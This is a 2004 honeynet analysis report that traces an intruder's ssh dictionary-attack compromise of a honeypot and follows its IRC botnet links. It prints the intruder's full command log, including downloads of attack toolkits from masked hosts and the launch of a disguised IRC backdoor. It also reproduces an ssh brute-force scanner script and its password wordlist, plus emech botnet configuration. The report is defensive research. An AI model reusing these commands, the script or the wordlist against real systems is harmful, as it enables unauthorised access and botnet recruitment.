文章作者:Steven Sim Kok Leong
Honeynet analysis for 02 Nov 2004
Analyzer on duty: Steven Sim Kok Leong (steven at security.org.sg)
We have ourselves a compromised honeypot on which a weak test account was exploited over ssh! This is great! An analysis of this compromise follows.
NOTE: Further details were snipped due to sensitivity concerns. If you need them, please email me.
Based on the actions taken by the intruder, I would conclude that this intruder is a script kiddie because he never bothered to cover any of his tracks by replacing system binaries with trojan ones or cleanse the log files such as the command history.
Below analysis shows that intruders often rely on the same vulnerability and exploits they used to attach the launchpad/zombie to attach other systems from the launchpad/zombie itself. More often than not, the system that compromised you is itself a compromised system. The ultimate motive (e.g. perhaps DDoS etc) for these zombied systems, beyond joining botnets and being used as launchpads to attack other systems on the Internet, are not yet known because at this point there aren't much IRC conversation noticed despite some IRC nick changes and chat messages (which are also reflected in snort alerts). Further monitoring of these channels by subsequent days' duty analyzers may be able to shed more light.
Regardless, in view of the considerable number of systems compromised due to weak passwords, system administrators are reminded to enforce strong passwords. Please refer to the list of recommendations and actions at one of our earlier advisories for system administrators [1]. In addition to these recommendations, from the network perspective network administrators are encouraged to take one or more of the following actions.
Block below list of ports TCP/6667, TCP/7000 and TCP/8888 used by the IRC botnet servers if possible (i.e. not in use by valid services)
Block below list of IRC botnet servers.
Block below list of attacker IP addresses (not very effective as most are dynamic IPs and/or compromised systems i.e. no malicious intent was intended from the administrators of these systems).
Restrict outgoing IRC traffic to a list of trusted IRC servers if possible (Principle of least privileges).
Monitor outgoing TCP/6667, TCP/7000 and TCP/8888 traffic at your border gateway.
Monitor both incoming and outgoing TCP/22 traffic at your border gateway.
--------------------------------------------------------------------------------
In consideration of the pretty persistent ssh dictionary password attacks [1] that have been ongoing for quite some time and targeting our honeynet, a test account with password test was created on 01 Nov 2004 at 1653 hrs for the purpose of having the honeypot compromised so as to observe and analyze hacker behavior and tactics.
Within less than 3 hours at 1944 hrs, a successful ssh dictionary attack on the test account took place remotely from X.X.X.X (South Korea). However, the session was immediately terminated without any commands being executed. From this, we inferred that it is likely a program script simply scouring the Internet for accessible ssh accounts with weak passwords and collating results for the intruder who launched the script to act upon.
On 02 Nov 2004, another successful ssh dictionary attack on the test account took place remotely at 2314 hrs from Y.Y.Y.Y (China). Again, like the session on 01 Nov, the session was immediately terminated once the SSH session was established.
--------------------------------------------------------------------------------
7 mins later at 2321 hrs on the same day, an intruder (either based on 01 Nov 1944 hrs or 02 Nov 2314 hrs results) started dropping his goods through the test account backdoor from Z.Z.Z.Z (South Korea). You will notice further in this analysis report that Z.Z.Z.Z is itself a compromised system that joined the IRC botnet (refer to list of compromised systems detected in the botnet).
He launched the following commands. The typos are indicative of a manual attack unlike earlier ssh dictionary attacks. In fact, the intruder specifically had problems with typing e i.e. either missing an "e" or missing the "e" and typing "w" and also occasionally missing "p"s and "t"s.
Command sequence Explanation
w Checking whether I am online..;-)
cd /tmp Change directory to /tmp
w Got worried. Checking whether I am online, again
ls Perform a listing of the /tmp/directory
wget A.A.A.A/cel.tgz Download cel.tgz
tar zxvf cel.tgz Unzip cel.tgz
rm -rf cel.tgz Remove cel.tgz
cd ssh Change directory to the ssh directory retrieved from cel.tgz
ls Perform a directory listing
ls Perform a directory listing again, perhaps couldn't believe what he saw?
./assh X Launch ssh dictionary attack at X.0.0.0/8 class A network. The portscan alerts by snort in the summary is a result of this.
w Got worried again. Checking again whether I am online.
passwd Changing password to protect his turf
wget
http://B.B.B.B:793/~zorg/local.tar.gz Download local exploit archive local.tar.gz deposited on polarhome at Aug 11 22:31
wget C.C.C.C/ccccccc/local.tar.gz Download another local exploit archive local.tar.gz, similar in size to the one downloaded from B.B.B.B except the timestamp. This one is deposited on Oct 6 22:11 at the geocities site.
wget D.D.D.D/psybnc.jpg Attempt download of a bnc irc backdoor archive. Unfortunately the file is not accessible over the web.
wget E.E.E.E/psybnc.jg Attempt failed because of typo. E.E.E.E/psybnc.jpg does exist.
ftp Intruder resorted to ftp'ing from D.D.D.D to download psybnc.jpg instead. Refer to more details below
passed Attempt password change of account to protect new turf, failed because of typo.
passwd Another attempt but failed because typo with the password
passwd Perhaps he was typing slower now so password change now successful.
tar zxvf psybnc.jpg Untaring the bnc irc client archive that masqueraded with a jpg extension to hide its harmful intensions.
rm -rf psybnc.jpg Removing the bnc irc backdoor archive
cd xsf Change directory to the xsf directory retrieved from psybnc.jpg
mv crond sh" "-i Move malicious bnc irc backdoor program called crond to sh" "-I to prevent it from being detected in ps process listing
export PATH="." Set the path so that the malicious binary can find assisting files in the same directory.
sh" "-i Launch the backdoor
exit Not sure why he has to type exit so many times
exi Typo again
texit Typo again. Not a very good typist or lousy keyboard.
exit Yet another try
exit Yet another time when he finally exited.
This logon session took 12 mins.
--------------------------------------------------------------------------------
First, lets take a deeper look into cel.tar.gz that was downloaded and the ./assh tool.
Listing of cel.tar.gz:
drwx------ httpd/root 0 2004-10-11 02:09:43 ssh/
-rwx------ httpd/root 453972 2004-07-13 02:09:58 ssh/ss
-rwxr-xr-x httpd/root 842424 2004-09-06 18:20:58 ssh/sshf
-rwx------ httpd/root 85 2004-07-13 02:10:33 ssh/go.sh
-rwx------ httpd/root 21407 2004-07-22 05:58:57 ssh/pscan2
-rwx------ httpd/root 206 2004-07-22 08:52:59 ssh/auto
-rwx------ httpd/root 605 2004-09-06 23:11:00 ssh/assh
-rwx------ httpd/root 4225 2004-07-22 08:35:14 ssh/129
-rw------- httpd/root 0 2004-07-23 08:28:03 ssh/129.98.pscan.22
Listing of ./assh script:
#!/bin/bash
if [ $# != 1 ]; then
echo " usage: $0 <b class>"
exit;
fi
echo " Versiune de scaner privata!"
echo "----------------------------------------------------"
echo " All my love for Liz! "
echo "----------------------------------------------------"
echo "# incep scanarea ..."
./pscan2 $1 22
sleep 10
cat $1.pscan.22 |sort |uniq > uniq.txt
oopsnr2=`grep -c . uniq.txt`
echo "# Am gasit $oopsnr2 de servere"
echo "----------------------------------------"
echo "# Incepem..."
./sshf 50
rm -rf $1.pscan.22 uniq.txt
echo "Asta a fost tot"
If we take a closer look at pscan2, here is its usage syntax to scan for servers having SSHD service running at TCP port 22.
Usage: %s <b-block> <port> [c-block]
Also looking at ./sshf being launched from the script, it contains a dictionary of userids cum passwords used in the ssh dictionary attack. openssl 0.9.7d libraries are used in the attack.
Here is the list of userids cum passwords used:
nobody
patrick
qwerty
compas
sniper
12345678
123456789
1234567890
rolo66
rolo
iceuser
horde
cyrus
wwwrun
matt
teste
test
test2
test23
test123
www-data
mysql
operator
apache
switch
c43vr013T
1gcec19v8yz153072
jane
pamela
shadow
eegch11
r00t
abcd1234
ctxmonitor
cosmin
%username%
%null%
00000000
111111
1234qwer
1p2o3i
@#$%^&
apollo
passwor
passion
passwd
redhat
people
qwaszx
qwert
tester
zxcvbnm
zxcvb
zorro
e4K1mo0$
f4r6k2g7t9q3
w5n8o7t9i6x3
o6v9z3d8y7m9
k1u7r1t2r1t8
w5u6s9v7k5t4
linux
stones
yellow
cooling
b604092
bash
cmcnew
kH9dzv
toor
actros
cip52
pharma
cip51
spyder
bk123qwe
Lex1c0n3
1q2w3e
webmaster
user01
user1
user02
oracle
sybase
account
backup
adam
alan
frank
george
henry
john
love
hate
iloveyou
present
--------------------------------------------------------------------------------
While the tools in local.tar.gz were never used, it contains the following
README listing:
all around local exploits..
4 linux , sunos , freebsd..
all public , no one private..
-
have phun
Zorg of texter
rohackingggggggggggggggg..:=)
Directory listing:
-rwxr-xr-x 1 5775 users 463529 Feb 23 2004 brk
-rwxr-xr-x 1 5775 users 452101 May 4 2004 brk2
-rwxr-xr-x 1 5775 users 4817 Jun 15 07:03 bsdsh
-rwxr-xr-x 1 5775 users 16154 Jul 31 07:06 dexter
-rwxr-xr-x 1 5775 users 17472 Jul 31 07:08 doptikbd
-rwxr-xr-x 1 5775 users 20216 Jul 31 07:13 f3
-rwxr-xr-x 1 5775 users 14860 Jul 31 06:41 kmod
-rwxr-xr-x 1 5775 users 19517 Jul 31 06:41 kmod2
-rwxr-xr-x 1 5775 users 445808 Aug 11 22:23 loginx
-rwxr-xr-x 1 5775 users 3078 Jun 20 2001 man-rh7.sh
-rwxr-xr-x 1 5775 users 1327 Jun 20 2001 modutils.sh
-rwxr-xr-x 1 5775 users 19414 Jul 31 06:29 mremap2
-rwxr-xr-x 1 5775 users 425887 Jul 31 06:30 mremap_pte
-rwxr-xr-x 1 5775 users 1729 May 5 2001 prlnx.sh
-rwxr-xr-x 1 5775 users 19910 Mar 20 2003 pt
-rwxr-xr-x 1 5775 users 19242 Jul 31 07:08 r0nin
-rw-r--r-- 1 5775 users 147 Aug 11 22:23 README
-rwxr-xr-x 1 5775 users 17318 Jul 31 07:08 rsybd
-rwxr-xr-x 1 5775 users 2311 May 5 2001 smlnx.sh
-rwxr-xr-x 1 5775 users 1759 Jul 31 06:52 stringetz
-rwxr-xr-x 1 5775 users 468689 Jul 31 06:30 w00t
-rwxr-xr-x 1 5775 users 4625 May 5 2001 xperl.sh
--------------------------------------------------------------------------------
Looking at the psybnc tool used
In psybnc.conf residing in the xsf directory, it shows that the system port TCP port 65500 is used.
PSYBNC.SYSTEM.PORT1=65500
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
--------------------------------------------------------------------------------
Let us check out the FTP session that was initiated.
Sebek was not yet installed on this honeypot. Thus, what goes on behind the ftp command is derived from the honeywall pcap trace. Afterall ftp is clear-text. Here are some snapshots of the hexadecimal and ascii traces.
Intruder logged in using the userid abc (masked)
07:30:58.280013 X.X.X.X.38381 > D.D.D.D.ftp: P 1:16(15) ack 24 win 5840 (DF) [tos 0x10]
0x0000 4510 0037 da54 4000 4006 b4b9 XXXX XXXX E..7.T@.@...XXXX
0x0010 DDDD DDDD 95ed 0015 62aa a912 fdb1 c69c DDDD....b.......
0x0020 5018 16d0 8154 0000 5553 4552 20aa bbcc P....T.. USER.abc
Intruder logged in using the password xyz (masked)
07:31:01.572491 X.X.X.X.38381 > D.D.D.D.ftp: P 16:30(14) ack 61 win 5840 (DF) [tos 0
x10]
0x0000 4510 0036 da56 4000 4006 b4b8 XXXX XXXX E..6.V@.@...XXXX
0x0010 DDDD DDDD 95ed 0015 62aa a921 fdb1 c6c1 DDDD....b..!....
0x0020 5018 16d0 67bf 0000 5041 5353 20xx yyzz P...g...PASS.xyz
Intruder downloaded psybnc.jpg
07:31:36.760693 D.D.D.D.ftp > X.X.X.X.38381: P 310:381(71) ack 90 win 5840 (DF)
0x0000 4500 006f a55a 4000 3106 f88b DDDD DDDD E..o.Z@.1...DDDD
0x0010 XXXX XXXX 0015 95ed fdb1 c7ba 62aa a96b XXXX........b..k
0x0020 5018 16d0 f43b 0000 3135 3020 4f70 656e P....;..150.Open
0x0030 696e 6720 4249 4e41 5259 206d 6f64 6520 ing.BINARY.mode.
0x0040 6461 7461 2063 6f6e 6e65 6374 696f 6e20 data.connection.
0x0050 666f 7220 7073 7962 6e63 2e6a 7067 2028 for.psybnc.jpg.(
0x0060 3539 3637 3330 2062 7974 6573 290d 0a 596730.bytes)..
Using the same ftp userid and password, all the exploits in the repository can be retrieved for research.
# ftp D.D.D.D
Connected to D.D.D.D (D.D.D.D).
220 D.D Members FTP
Name (D.D.D.D:root): abc
331 Password required for abc.
Password:
230 User abc logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (D,D,D,D,102,150).
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 37558 Oct 15 14:00 big.jpg
-rw-r--r-- 1 free web 377371 Aug 29 19:32 bk.tar.gz
-rw-r--r-- 1 free web 13342 Oct 18 17:58 brutessh2.tgz
-rw-r--r-- 1 free web 787019 Oct 13 17:24 dcstealth.zip
-rw-r--r-- 1 free web 720324 Sep 26 07:59 emech-madalin.tar.gz
-rw-r--r-- 1 free web 720348 Sep 21 18:56 emech.tar.gz
-rw-r--r-- 1 free web 720336 Sep 26 16:58 emechm.tar.gz
-rw-r--r-- 1 free web 173960 Sep 14 14:15 flood.tgz
-rw-r--r-- 1 free web 391294 Sep 24 11:19 massSSH.tgz
-rw-r--r-- 1 free web 717959 Sep 2 20:16 mech.tar.gz
-rw-r--r-- 1 free web 9052 Sep 16 18:09 miro.tgz
-rw-r--r-- 1 free web 80679 Oct 2 12:19 muie.mp3
-rw-r--r-- 1 free web 596730 Aug 30 05:51 psybnc.jpg
-rw-r--r-- 1 free web 895785 Sep 2 07:26 scan.tar
-rw-r--r-- 1 free web 26510 Sep 1 12:09 x.tar.gz
-rw-r--r-- 1 free web 10141 Sep 2 07:26 za.tgz
--------------------------------------------------------------------------------
After logging out, the intruder immediately re-login again at 2333 hrs from Z.Z.Z.Z.
The reason being that his psybnc irc system control backdoor at TCP port 65500 is not working. Thus, he typed the following commands to workaround this handicap. He was probably too lazy to probe the ports opened to the Internet at the border firewall.
Command Sequence Explanation
cd /tmp Change directory to /tmp
sbin/iptables -I INPUT -p tcp --dport 65500 -j ACCEPT Attempting to update iptables to allow access to port 65500 but failed because he missed out the / at the front
/sbin/iptables -I INPUT -p tcp --dport 65500 -j ACCEPT Second attempt to update iptables to allow access to port 65500 simply because he isn't root with superuser privileges.
wget E.E.E.E/emech.tar.gz Next, he downloads emech irc backdoor archive from E.E.E.E. He probably chose another irc backdoor client because he thought the problem lies with his earlier psybnc irc backdoor toolkit. Instead of attempting any of the local privilege escalation exploits provided by local.tar.gz he downloaded in his earlier session, he downloaded emech.tar.gz which is another irc backdoor toolkit.
tar zxvf emech.tar.gz Untaring the emech.tar.gz irc backdoor archive
rm -rf mech.tar.gz He failed to remove the archive, because of typo i.e. missed the "e" in front.
cd mech Change directory to emech directory extracted from emech.tar.gz
./mech Launch mech backdoor
exit This time exit only once was successful.
This logon session took 11 mins.
--------------------------------------------------------------------------------
Checking out emesh.
The IRC configuration file of emech i.e. mech.session has this:
hasonotice
nick Free`Bnc
login woot
ircname Who am I ?
modes ix
cmdchar
userfile emech.users3
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]dea
channel #[snipped]eam
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick PutMeUp
login hack
ircname Powerd By Romanian Hackers
modes ix
cmdchar
userfile emech.users2
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]dea
channel #[snipped]eam
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick Ascultat
login root
ircname 0,1Protected by National #[snipped]rum Team !!!
modes ix
cmdchar
userfile emech.users1
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick FavoritX
login cool
ircname Missing You Baby...
modes ix
cmdchar
userfile emech.users
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
[Post-sorted for ease of identification]
[Servers using TCP/6667]
server F.F.F.2 6667
server G.G.G.133 6667
server H.H.H.H 6667
server I.I.I.150 6667
server J.J.J.246 6667
server K.K.K.100 6667
server L.L.L.33 6667
[Servers using TCP/7000]
server M.M.M.248 7000
[Servers using TCP/8888]
server N.N.N.2 8888
From the configuration file, we can identify all the IRC servers used for the botnet as well as IRC backdoor accounts that have joined the large botnet. Use of above IRC servers is further proven from the pcap traces.
These are some of IRC backdoor accounts that have joined the large botnet. IP addresses indicate the IP addresses of compromised IRC botnet zombies.
[Details have been snipped due to sensitivity reasons]
Multiple different entries of: ~cool@[snipped]
~hack@[snipped]
~root@[snipped]
~woot@[snipped]
[Other entries snipped]
What caught my attention most is ~woot@Z.Z.Z.Z (This is the system that compromised our honeypot!)
The IRC channels used and verified in pcap traces are:
channel #[snipped]rum
channel #[snipped]eam
channel #[snipped]dea
channel #[snipped]gia
Here's a couple of the pcap traces:
07:57:05.188294 F.F.F.2.ircd > X.X.X.X.38408: P 3217:4347(1130) ack 179 win 28
96 (DF)
[Details snipped]
07:57:05.944658 F.F.F.2.ircd > X.X.X.X.38408: . 5435:6883(1448) ack 179 win 28
96 (DF)
[Details snipped]
--------------------------------------------------------------------------------
Beyond the compromise, there are observably quite a fair bit of FTP scanning.
Taking just one of the hosts that scanned us i.e. G.G.G.146, it looks like a harmless FTP probe to check for the availability of the service. Since the FTP service is not enabled on honeypot-rhl, perhaps our next activity should be to enable this service to capture and observe a successful compromise of it.
FTP scanning:
6 O.O.O.146
4 P.P.P.104
3 Q.Q.Q.202
2 R.R.R.57
2 S.S.S.130
--------------------------------------------------------------------------------
Conclusion
This is our first honeypot compromise and it has already proved to be most interesting. Further details (without compromising sensitivity) might be offered by other duty analyzers in the next few days. In the near future, the team will work on various configurations to track and understand blackhats.
--------------------------------------------------------------------------------
References:
[1]
http://www.security.org.sg/gtec/ ... .php?diary=20040921
Count Intrusion attempt
107 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 15) Scanner(fixed: 0 sliding: 0)
106 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 30) Scanner(fixed: 0 sliding: 0)
80 Portscan detected from X.X.X.X Talker (fixed: 15 sliding: 29) Scanner(fixed: 0 sliding: 0)
80 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 14) Scanner(fixed: 0 sliding: 0)
79 Portscan detected from X.X.X.X Talker(fixed: 1 sliding: 30) Scanner(fixed: 0 sliding: 0)
33 ICMP Destination Unreachable Port Unreachable
31 BACKDOOR typot trojan traffic
24 CHAT IRC message
24 BAD-TRAFFIC loopback traffic
22 SHELLCODE x86 NOOP
12 SIG^2 GTEC-honeynet - Possible NACHI worm ICMP ECHO traffic
11 MS-SQL Worm propagation attempt
10 ICMP Echo Reply
7 ICMP PING
3 ICMP PING NMAP
3 CHAT IRC nick change
2 (spp_stream4) possible EVASIVE RST detection
1 WEB-MISC bad HTTP/1.1 request, Potentially worm attack
1 WEB-MISC WebDAV search access
1 WEB-IIS view source via translate header
1 SHELLCODE x86 setgid 0
1 ATTACK-RESPONSES 403 Forbidden
1 (http_inspect) OVERSIZE REQUEST-URI DIRECTORY
1 (http_inspect) BARE BYTE UNICODE ENCODING
Country sources of attacks
9 China (CN)
6 United States of America (US)
3 Singapore (SG)
2 South Korea (KR)
2 Japan (JP)
1 Turkey (TR)
1 Trinidad and Tobago (TT)
1 Netherlands (NL)
1 Latvia (LV)
1 Italy (IT)
1 Germany (DE)
1 Chile (CL)
1 Brazil (BR)
1 Austria (AT)
1 Australia (AU)
